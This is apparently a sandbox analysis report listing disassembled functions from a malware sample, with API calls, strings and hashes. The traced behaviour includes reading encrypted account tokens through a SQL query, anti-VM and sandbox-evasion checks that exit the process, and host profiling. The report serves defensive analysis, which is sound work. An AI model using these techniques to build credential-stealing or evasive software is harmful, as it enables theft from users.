Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9

Function 00416B70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00416B7E

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
memset.MSVCRT ref: 00416C0A
??_V@YAXPAX@Z.MSVCRT ref: 00416D5E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
Opcode Fuzzy Hash: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D

Function 0040B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000), ref: 0040BADD

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BB0B
lstrlenA.KERNEL32(00000000), ref: 0040BBE3
lstrlenA.KERNEL32(00000000), ref: 0040BBF7

Strings

AccountId, xrefs: 0040BB02
SELECT service, encrypted_token FROM token_service, xrefs: 0040BA4B
AccountTokens, xrefs: 0040B91A
AccountTokens, xrefs: 0040B9A9

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: a6258dff7c498ef9fc5713ca3bc64ec03fcf22d405109b9fbc5befe736a0183d
Instruction ID: 210edd3ff24f1e31e7376af0b8f6dc5aafa9379f597eea4b8f30950ff7929db6
Opcode Fuzzy Hash: a6258dff7c498ef9fc5713ca3bc64ec03fcf22d405109b9fbc5befe736a0183d
Instruction Fuzzy Hash: 32A16271911108ABCF14FBA1DC56EEE7339AF54318F40416EF40772191EF786A98CBAA

Function 00416490 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026BCB58), ref: 004192B1
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026BCA80), ref: 004192CA
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6D78), ref: 004192E2
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6DC0), ref: 004192FA
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6D90), ref: 00419313
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026B6420), ref: 0041932B
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026B5B88), ref: 00419343
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026B5A28), ref: 0041935C
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6DA8), ref: 00419374
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6DD8), ref: 0041938C
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6D48), ref: 004193A5
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6DF0), ref: 004193BD
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026B5BE8), ref: 004193D5
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,026D6D30), ref: 004193EE

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416210: GetUserDefaultLangID.KERNEL32(?,?,004164C6,00420ADA), ref: 00416214

GetUserDefaultLangID.KERNEL32 ref: 004164C6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,026B6470,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,026B6470,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: ccee0ec233981a7f23174bedbb88d87c01656955d14582984d8384db89f557cd
Instruction ID: 0c3fac6cf7b50bea5c1f94bc3db5f65e3227356296d56eb517008ea5f4118e6e
Opcode Fuzzy Hash: ccee0ec233981a7f23174bedbb88d87c01656955d14582984d8384db89f557cd
Instruction Fuzzy Hash: 03317130941108BACB14FBF2DC56BEE7739AF18318F50452EF513A6092DFBC6985C66A

Function 00417E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

RegQueryValueExA.KERNEL32(00000000,026D9610,00000000,000F003F,?,00000400), ref: 00417F8C
lstrlenA.KERNEL32(?), ref: 00417FA1
RegQueryValueExA.KERNEL32(00000000,026D9538,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B24), ref: 00418039
RegCloseKey.KERNEL32(00000000), ref: 004180A8
RegCloseKey.ADVAPI32(00000000), ref: 004180BA

Strings

%s\%s, xrefs: 00417EED

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction ID: 0d61fbe7999a289fff57b0559f919f0328d455d47faa6f76a7bc41a93025e826
Opcode Fuzzy Hash: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction Fuzzy Hash: 2B211971A0021CABDB24DF54DC85FD9B7B9FB48714F00C199A609A6280DF756AC6CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040483A
??_U@YAPAXI@Z.MSVCRT ref: 00404851
??2@YAPAXI@Z.MSVCRT ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ??2@CrackInternetlstrlen
String ID: <
API String ID: 184842949-4251816714
Opcode ID: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
Opcode Fuzzy Hash: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

Function 00417130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
HeapAlloc.KERNEL32(00000000), ref: 0041714B
RegOpenKeyExA.KERNEL32(80000002,026B9BF0,00000000,00020119,00000000), ref: 0041717D
RegQueryValueExA.KERNEL32(00000000,026D94F0,00000000,00000000,?,000000FF), ref: 0041719E
RegCloseKey.ADVAPI32(00000000), ref: 004171A8

Strings

Windows 11, xrefs: 0041715D

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction ID: 198b37f2a351322ee600fb862932720b373255b2f394089b4190a5419862cb8c
Opcode Fuzzy Hash: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction Fuzzy Hash: 4C018F74A40208BFEB10DFE4DD49FAE7779EB08710F104098FA0997290D6749A428B64

Function 004171C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004171D4
HeapAlloc.KERNEL32(00000000), ref: 004171DB
RegOpenKeyExA.KERNEL32(80000002,026B9BF0,00000000,00020119,00417159), ref: 004171FB
RegQueryValueExA.KERNEL32(00417159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041721A
RegCloseKey.ADVAPI32(00417159), ref: 00417224

Strings

CurrentBuildNumber, xrefs: 00417211

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction ID: 00cad297c96af00baba5933f046dbcc6cd847f8af16dedc1aa1025fe7f1f3d79
Opcode Fuzzy Hash: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction Fuzzy Hash: EE014FB9A40708BFDB10DFE0DC4AFAEB779EB08704F104558FA05A7291D674AA418B55

Function 00413BC0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413BE5
RegOpenKeyExA.KERNEL32(80000001,026D9A40,00000000,00020119,?), ref: 00413C04
RegQueryValueExA.ADVAPI32(?,026DA2D0,00000000,00000000,00000000,000000FF), ref: 00413C28
RegCloseKey.ADVAPI32(?), ref: 00413C32
lstrcat.KERNEL32(?,00000000), ref: 00413C57
lstrcat.KERNEL32(?,026DA5A0), ref: 00413C6B

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
Instruction ID: 29de2a712fc1e2dfcbf32ad4341a25eb625067ccdef54b7492a2b75d077fe01c
Opcode Fuzzy Hash: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
Instruction Fuzzy Hash: 1841B8B69001086BDB24EBA0DC46FEE733DAB88304F00895DB619561D1FEB957CC8BD5

Function 00413070 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413098

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

strtok_s.MSVCRT ref: 004131E1

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction ID: 79a306a9ddce9c6cdb539d8aaa48a82ffdeeeca754e5da37ea89086183b8fd1c
Opcode Fuzzy Hash: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction Fuzzy Hash: 87416371E01108ABCB04EFE5DC89AEEB774BF44314F00801EE51677251DB78AA95CF9A

Function 00409A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

